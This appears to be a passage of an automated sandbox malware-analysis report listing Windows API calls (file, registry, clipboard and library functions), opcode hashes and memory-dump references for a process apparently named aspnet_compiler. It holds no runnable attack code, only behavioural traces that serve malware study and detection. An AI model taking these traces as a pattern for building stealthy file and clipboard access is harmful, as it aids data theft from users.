                                                                                                                                                                                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1828521557-0
                                                                                                                                                                                                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00406942
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 609303285-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                                                                                                                                                                                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2081463915-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                                                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                                                                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1936579350-0
                                                                                                                                                                                                                                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74CB5970,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                                                                  • API String ID: 403622227-2664311388
                                                                                                                                                                                                                                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                                                  • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                                                                                                                                                                    • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                                                    • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                                                                    • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                                                                    • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                                                                    • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                                                                    • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                                                                    • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                                                                    • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                                                                    • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1203541146-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                                                                                  • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                                                                                                                  • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                                                                                                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                  • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                                                                                                  • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
